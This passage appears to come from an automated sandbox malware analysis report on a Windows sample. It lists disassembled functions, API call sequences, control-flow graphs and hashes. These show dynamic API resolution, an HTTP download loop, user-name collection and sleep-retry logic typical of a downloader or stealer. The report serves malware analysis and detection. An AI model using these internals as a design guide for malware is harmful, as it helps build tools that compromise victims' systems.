                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 7147283270a2ef694bbe0d192777cb623317d27bbeb7bf1e7d04d51fb10e5c35
                              • Instruction ID: e3e81f41a5b26d17815740c274714fd7b7f7b8232b0dd743097e4dd24b25da68
                              • Opcode Fuzzy Hash: 7147283270a2ef694bbe0d192777cb623317d27bbeb7bf1e7d04d51fb10e5c35
                              • Instruction Fuzzy Hash: 6612B872910618AADB16EBA0DC92FEEB778AF14300F504199F1467B091EF742F49DF62
                              Function 00337850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003211B7), ref: 00337880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00337887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0033789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: a32a3ed079ca4fd79191d508a5a7c295fc1d148aea7fbc81e9c985285d05053e
                              • Instruction ID: 75dbd34bf692144f110190ef19d5510b231cf3a32af494d2e615702567d3ccdf
                              • Opcode Fuzzy Hash: a32a3ed079ca4fd79191d508a5a7c295fc1d148aea7fbc81e9c985285d05053e
                              • Instruction Fuzzy Hash: 7FF04FB1944209ABC710DF98DD8ABAEFBB8EB08711F10025AFA05A3680C7B415048FA1
                              Function 00321160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 22daf803adba7f55558a9213d54987d9707c3c4b80da7d7ea3dbebe0e6445042
                              • Instruction ID: 211025eb8a959c50005d105899a95d45148d983ae893a2374a7452629f84e3e6
                              • Opcode Fuzzy Hash: 22daf803adba7f55558a9213d54987d9707c3c4b80da7d7ea3dbebe0e6445042
                              • Instruction Fuzzy Hash: B7D05E7490030CDBCB00DFE4E94A6DDBB78FB18311F000554D90573340EA70A496CAA6
                              Function 00339C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 339c10-339c1a 634 339c20-33a031 GetProcAddress * 43 633->634 635 33a036-33a0ca LoadLibraryA * 8 633->635 634->635 636 33a146-33a14d 635->636 637 33a0cc-33a141 GetProcAddress * 5 635->637 638 33a153-33a211 GetProcAddress * 8 636->638 639 33a216-33a21d 636->639 637->636 638->639 640 33a298-33a29f 639->640 641 33a21f-33a293 GetProcAddress * 5 639->641 642 33a337-33a33e 640->642 643 33a2a5-33a332 GetProcAddress * 6 640->643 641->640 644 33a344-33a41a GetProcAddress * 9 642->644 645 33a41f-33a426 642->645 643->642 644->645 646 33a4a2-33a4a9 645->646 647 33a428-33a49d GetProcAddress * 5 645->647 648 33a4ab-33a4d7 GetProcAddress * 2 646->648 649 33a4dc-33a4e3 646->649 647->646 648->649 650 33a515-33a51c 649->650 651 33a4e5-33a510 GetProcAddress * 2 649->651 652 33a612-33a619 650->652 653 33a522-33a60d GetProcAddress * 10 650->653 651->650 654 33a61b-33a678 GetProcAddress * 4 652->654 655 33a67d-33a684 652->655 653->652 654->655 656 33a686-33a699 GetProcAddress 655->656 657 33a69e-33a6a5 655->657 656->657 658 33a6a7-33a703 GetProcAddress * 4 657->658 659 33a708-33a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01085A30), ref: 00339C2D
                              • GetProcAddress.KERNEL32(74DD0000,01085A90), ref: 00339C45
                              • GetProcAddress.KERNEL32(74DD0000,01099640), ref: 00339C5E
                              • GetProcAddress.KERNEL32(74DD0000,01099628), ref: 00339C76
                              • GetProcAddress.KERNEL32(74DD0000,010996D0), ref: 00339C8E
                              • GetProcAddress.KERNEL32(74DD0000,01099610), ref: 00339CA7
                              • GetProcAddress.KERNEL32(74DD0000,0108BAB8), ref: 00339CBF
                              • GetProcAddress.KERNEL32(74DD0000,0109D530), ref: 00339CD7
                              • GetProcAddress.KERNEL32(74DD0000,0109D518), ref: 00339CF0
                              • GetProcAddress.KERNEL32(74DD0000,0109D590), ref: 00339D08
                              • GetProcAddress.KERNEL32(74DD0000,0109D4A0), ref: 00339D20
                              • GetProcAddress.KERNEL32(74DD0000,01085A70), ref: 00339D39
                              • GetProcAddress.KERNEL32(74DD0000,01085730), ref: 00339D51
                              • GetProcAddress.KERNEL32(74DD0000,01085770), ref: 00339D69
                              • GetProcAddress.KERNEL32(74DD0000,01085790), ref: 00339D82
                              • GetProcAddress.KERNEL32(74DD0000,0109D5A8), ref: 00339D9A
                              • GetProcAddress.KERNEL32(74DD0000,0109D500), ref: 00339DB2
                              • GetProcAddress.KERNEL32(74DD0000,0108B9F0), ref: 00339DCB
                              • GetProcAddress.KERNEL32(74DD0000,010857B0), ref: 00339DE3
                              • GetProcAddress.KERNEL32(74DD0000,0109D548), ref: 00339DFB
                              • GetProcAddress.KERNEL32(74DD0000,0109D3F8), ref: 00339E14
                              • GetProcAddress.KERNEL32(74DD0000,0109D410), ref: 00339E2C
                              • GetProcAddress.KERNEL32(74DD0000,0109D428), ref: 00339E44
                              • GetProcAddress.KERNEL32(74DD0000,010857D0), ref: 00339E5D
                              • GetProcAddress.KERNEL32(74DD0000,0109D440), ref: 00339E75
                              • GetProcAddress.KERNEL32(74DD0000,0109D560), ref: 00339E8D
                              • GetProcAddress.KERNEL32(74DD0000,0109D578), ref: 00339EA6
                              • GetProcAddress.KERNEL32(74DD0000,0109D458), ref: 00339EBE
                              • GetProcAddress.KERNEL32(74DD0000,0109D470), ref: 00339ED6
                              • GetProcAddress.KERNEL32(74DD0000,0109D488), ref: 00339EEF
                              • GetProcAddress.KERNEL32(74DD0000,0109D4B8), ref: 00339F07
                              • GetProcAddress.KERNEL32(74DD0000,0109D4E8), ref: 00339F1F
                              • GetProcAddress.KERNEL32(74DD0000,0109D4D0), ref: 00339F38
                              • GetProcAddress.KERNEL32(74DD0000,0109A2D0), ref: 00339F50
                              • GetProcAddress.KERNEL32(74DD0000,0109D008), ref: 00339F68
                              • GetProcAddress.KERNEL32(74DD0000,0109CE58), ref: 00339F81
                              • GetProcAddress.KERNEL32(74DD0000,01085810), ref: 00339F99
                              • GetProcAddress.KERNEL32(74DD0000,0109CFF0), ref: 00339FB1
                              • GetProcAddress.KERNEL32(74DD0000,01085830), ref: 00339FCA
                              • GetProcAddress.KERNEL32(74DD0000,0109D068), ref: 00339FE2
                              • GetProcAddress.KERNEL32(74DD0000,0109D0B0), ref: 00339FFA
                              • GetProcAddress.KERNEL32(74DD0000,01085850), ref: 0033A013
                              • GetProcAddress.KERNEL32(74DD0000,01085D30), ref: 0033A02B
                              • LoadLibraryA.KERNEL32(0109D020,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A03D
                              • LoadLibraryA.KERNEL32(0109CF00,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A04E
                              • LoadLibraryA.KERNEL32(0109CE28,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A060
                              • LoadLibraryA.KERNEL32(0109D080,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A072
                              • LoadLibraryA.KERNEL32(0109CF78,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A083
                              • LoadLibraryA.KERNEL32(0109D038,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A095
                              • LoadLibraryA.KERNEL32(0109CF18,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A0A7
                              • LoadLibraryA.KERNEL32(0109D050,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A0B8
                              • GetProcAddress.KERNEL32(75290000,01085D90), ref: 0033A0DA
                              • GetProcAddress.KERNEL32(75290000,0109CF90), ref: 0033A0F2
                              • GetProcAddress.KERNEL32(75290000,010991B8), ref: 0033A10A
                              • GetProcAddress.KERNEL32(75290000,0109CF30), ref: 0033A123
                              • GetProcAddress.KERNEL32(75290000,01085CD0), ref: 0033A13B
                              • GetProcAddress.KERNEL32(6FCD0000,0108B900), ref: 0033A160
                              • GetProcAddress.KERNEL32(6FCD0000,01085BD0), ref: 0033A179
                              • GetProcAddress.KERNEL32(6FCD0000,0108B6D0), ref: 0033A191
                              • GetProcAddress.KERNEL32(6FCD0000,0109CFA8), ref: 0033A1A9
                              • GetProcAddress.KERNEL32(6FCD0000,0109D098), ref: 0033A1C2
                              • GetProcAddress.KERNEL32(6FCD0000,01085B30), ref: 0033A1DA
                              • GetProcAddress.KERNEL32(6FCD0000,01085DF0), ref: 0033A1F2
                              • GetProcAddress.KERNEL32(6FCD0000,0109CF48), ref: 0033A20B
                              • GetProcAddress.KERNEL32(752C0000,01085DB0), ref: 0033A22C
                              • GetProcAddress.KERNEL32(752C0000,01085DD0), ref: 0033A244
                              • GetProcAddress.KERNEL32(752C0000,0109CFD8), ref: 0033A25D
                              • GetProcAddress.KERNEL32(752C0000,0109D0C8), ref: 0033A275
                              • GetProcAddress.KERNEL32(752C0000,01085E10), ref: 0033A28D
                              • GetProcAddress.KERNEL32(74EC0000,0108BA40), ref: 0033A2B3
                              • GetProcAddress.KERNEL32(74EC0000,0108BA68), ref: 0033A2CB
                              • GetProcAddress.KERNEL32(74EC0000,0109CF60), ref: 0033A2E3
                              • GetProcAddress.KERNEL32(74EC0000,01085BF0), ref: 0033A2FC
                              • GetProcAddress.KERNEL32(74EC0000,01085D50), ref: 0033A314
                              • GetProcAddress.KERNEL32(74EC0000,0108B7E8), ref: 0033A32C
                              • GetProcAddress.KERNEL32(75BD0000,0109CEE8), ref: 0033A352
                              • GetProcAddress.KERNEL32(75BD0000,01085B70), ref: 0033A36A
                              • GetProcAddress.KERNEL32(75BD0000,01099248), ref: 0033A382
                              • GetProcAddress.KERNEL32(75BD0000,0109D0E0), ref: 0033A39B
                              • GetProcAddress.KERNEL32(75BD0000,0109CFC0), ref: 0033A3B3
                              • GetProcAddress.KERNEL32(75BD0000,01085AD0), ref: 0033A3CB
                              • GetProcAddress.KERNEL32(75BD0000,01085CF0), ref: 0033A3E4
                              • GetProcAddress.KERNEL32(75BD0000,0109CDF8), ref: 0033A3FC
                              • GetProcAddress.KERNEL32(75BD0000,0109CE10), ref: 0033A414
                              • GetProcAddress.KERNEL32(75A70000,01085E50), ref: 0033A436
                              • GetProcAddress.KERNEL32(75A70000,0109CE88), ref: 0033A44E
                              • GetProcAddress.KERNEL32(75A70000,0109CEB8), ref: 0033A466
                              • GetProcAddress.KERNEL32(75A70000,0109CE70), ref: 0033A47F
                              • GetProcAddress.KERNEL32(75A70000,0109CE40), ref: 0033A497
                              • GetProcAddress.KERNEL32(75450000,01085B90), ref: 0033A4B8
                              • GetProcAddress.KERNEL32(75450000,01085E30), ref: 0033A4D1
                              • GetProcAddress.KERNEL32(75DA0000,01085C10), ref: 0033A4F2
                              • GetProcAddress.KERNEL32(75DA0000,0109CEA0), ref: 0033A50A
                              • GetProcAddress.KERNEL32(6F070000,01085AF0), ref: 0033A530
                              • GetProcAddress.KERNEL32(6F070000,01085D10), ref: 0033A548
                              • GetProcAddress.KERNEL32(6F070000,01085B50), ref: 0033A560
                              • GetProcAddress.KERNEL32(6F070000,0109CED0), ref: 0033A579
                              • GetProcAddress.KERNEL32(6F070000,01085BB0), ref: 0033A591
                              • GetProcAddress.KERNEL32(6F070000,01085D70), ref: 0033A5A9
                              • GetProcAddress.KERNEL32(6F070000,01085AB0), ref: 0033A5C2
                              • GetProcAddress.KERNEL32(6F070000,01085B10), ref: 0033A5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0033A5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0033A607
                              • GetProcAddress.KERNEL32(75AF0000,0109D2D8), ref: 0033A629
                              • GetProcAddress.KERNEL32(75AF0000,01099108), ref: 0033A641
                              • GetProcAddress.KERNEL32(75AF0000,0109D260), ref: 0033A659
                              • GetProcAddress.KERNEL32(75AF0000,0109D188), ref: 0033A672
                              • GetProcAddress.KERNEL32(75D90000,01085C30), ref: 0033A693
                              • GetProcAddress.KERNEL32(6E160000,0109D338), ref: 0033A6B4
                              • GetProcAddress.KERNEL32(6E160000,01085C50), ref: 0033A6CD
                              • GetProcAddress.KERNEL32(6E160000,0109D3E0), ref: 0033A6E5
                              • GetProcAddress.KERNEL32(6E160000,0109D0F8), ref: 0033A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d57775746f97e7b837e6761e690305138da0bf85663ac97dc4a1c02b3282459b
                              • Instruction ID: df38c8386932f23459b5ee11e5901f9d4f7bc495514792b33a9ded1d69147844
                              • Opcode Fuzzy Hash: d57775746f97e7b837e6761e690305138da0bf85663ac97dc4a1c02b3282459b
                              • Instruction Fuzzy Hash: B4625FB5500240AFC748DFACEE8895637F9F7AC301714851AE605E3235DBB9A84AFF52
                              Function 00326280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 326280-32630b call 33a7a0 call 3247b0 call 33a740 InternetOpenA StrCmpCA 1040 326314-326318 1033->1040 1041 32630d 1033->1041 1042 326509-326525 call 33a7a0 call 33a800 * 2 1040->1042 1043 32631e-326342 InternetConnectA 1040->1043 1041->1040 1062 326528-32652d 1042->1062 1045 326348-32634c 1043->1045 1046 3264ff-326503 InternetCloseHandle 1043->1046 1047 32635a 1045->1047 1048 32634e-326358 1045->1048 1046->1042 1050 326364-326392 HttpOpenRequestA 1047->1050 1048->1050 1052 3264f5-3264f9 InternetCloseHandle 1050->1052 1053 326398-32639c 1050->1053 1052->1046 1055 3263c5-326405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 32639e-3263bf InternetSetOptionA 1053->1056 1058 326407-326427 call 33a740 call 33a800 * 2 1055->1058 1059 32642c-32644b call 338940 1055->1059 1056->1055 1058->1062 1066 3264c9-3264e9 call 33a740 call 33a800 * 2 1059->1066 1067 32644d-326454 1059->1067 1066->1062 1069 326456-326480 InternetReadFile 1067->1069 1070 3264c7-3264ef InternetCloseHandle 1067->1070 1073 326482-326489 1069->1073 1074 32648b 1069->1074 1070->1052 1073->1074 1078 32648d-3264c5 call 33a9b0 call 33a8a0 call 33a800 1073->1078 1074->1070 1078->1069
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                                • Part of subcall function 003247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • InternetOpenA.WININET(00340DFE,00000001,00000000,00000000,00000000), ref: 003262E1
                              • StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00326303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00326335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0109E398,00000000,00000000,00400100,00000000), ref: 00326385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003263BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003263D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003263FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0032646D
                              • InternetCloseHandle.WININET(00000000), ref: 003264EF
                              • InternetCloseHandle.WININET(00000000), ref: 003264F9
                              • InternetCloseHandle.WININET(00000000), ref: 00326503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 00a8ac875a730e3da7800999ad69453f33615747e1cf57cb4c83b387a050b69c
                              • Instruction ID: 3018af24a5b6518910f6526ab8acb68ad5d19088933281c84fd326dfc4466d31
                              • Opcode Fuzzy Hash: 00a8ac875a730e3da7800999ad69453f33615747e1cf57cb4c83b387a050b69c
                              • Instruction Fuzzy Hash: 49714F71A00218ABDB15EFA4DC95FEE77B8FF44700F108198F50A6B190DBB46A89DF51
                              Function 00335510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 335510-335577 call 335ad0 call 33a820 * 3 call 33a740 * 4 1106 33557c-335583 1090->1106 1107 3355d7-33564c call 33a740 * 2 call 321590 call 3352c0 call 33a8a0 call 33a800 call 33aad0 StrCmpCA 1106->1107 1108 335585-3355b6 call 33a820 call 33a7a0 call 321590 call 3351f0 1106->1108 1134 335693-3356a9 call 33aad0 StrCmpCA 1107->1134 1138 33564e-33568e call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1107->1138 1124 3355bb-3355d2 call 33a8a0 call 33a800 1108->1124 1124->1134 1139 3356af-3356b6 1134->1139 1140 3357dc-335844 call 33a8a0 call 33a820 * 2 call 321670 call 33a800 * 4 call 336560 call 321550 1134->1140 1138->1134 1143 3357da-33585f call 33aad0 StrCmpCA 1139->1143 1144 3356bc-3356c3 1139->1144 1270 335ac3-335ac6 1140->1270 1162 335991-3359f9 call 33a8a0 call 33a820 * 2 call 321670 call 33a800 * 4 call 336560 call 321550 1143->1162 1163 335865-33586c 1143->1163 1147 3356c5-335719 call 33a820 call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1144->1147 1148 33571e-335793 call 33a740 * 2 call 321590 call 3352c0 call 33a8a0 call 33a800 call 33aad0 StrCmpCA 1144->1148 1147->1143 1148->1143 1249 335795-3357d5 call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1148->1249 1162->1270 1170 335872-335879 1163->1170 1171 33598f-335a14 call 33aad0 StrCmpCA 1163->1171 1178 3358d3-335948 call 33a740 * 2 call 321590 call 3352c0 call 33a8a0 call 33a800 call 33aad0 StrCmpCA 1170->1178 1179 33587b-3358ce call 33a820 call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1170->1179 1199 335a16-335a21 Sleep 1171->1199 1200 335a28-335a91 call 33a8a0 call 33a820 * 2 call 321670 call 33a800 * 4 call 336560 call 321550 1171->1200 1178->1171 1275 33594a-33598a call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1143 1275->1171
                              APIs
                                • Part of subcall function 0033A820: lstrlen.KERNEL32(00324F05,?,?,00324F05,00340DDE), ref: 0033A82B
                                • Part of subcall function 0033A820: lstrcpy.KERNEL32(00340DDE,00000000), ref: 0033A885
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00335644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003356A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00335857
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00335228
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 003352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00335318
                                • Part of subcall function 003352C0: lstrlen.KERNEL32(00000000), ref: 0033532F
                                • Part of subcall function 003352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00335364
                                • Part of subcall function 003352C0: lstrlen.KERNEL32(00000000), ref: 00335383
                                • Part of subcall function 003352C0: lstrlen.KERNEL32(00000000), ref: 003353AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0033578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00335940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00335A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00335A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
